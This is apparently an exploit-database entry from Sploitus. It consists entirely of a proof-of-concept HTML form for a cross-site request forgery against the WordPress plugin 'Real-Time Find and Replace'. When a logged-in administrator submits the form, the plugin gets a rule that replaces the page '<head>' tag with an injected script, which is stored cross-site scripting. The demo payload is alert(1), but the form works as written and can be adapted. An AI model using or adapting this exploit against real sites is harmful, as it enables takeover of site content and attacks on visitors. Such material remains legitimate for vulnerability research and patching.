Share
## https://sploitus.com/exploit?id=WPEX-ID:10193
<html>
  <body>
    <form action="http://URL/wp-admin/tools.php?page=real-time-find-and-replace" method="POST">
      <input type="hidden" name="setup&#45;update" value="" />
      <input type="hidden" name="farfind&#91;0&#93;" value="&lt;head&gt;" />
      <input type="hidden" name="farreplace&#91;0&#93;" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>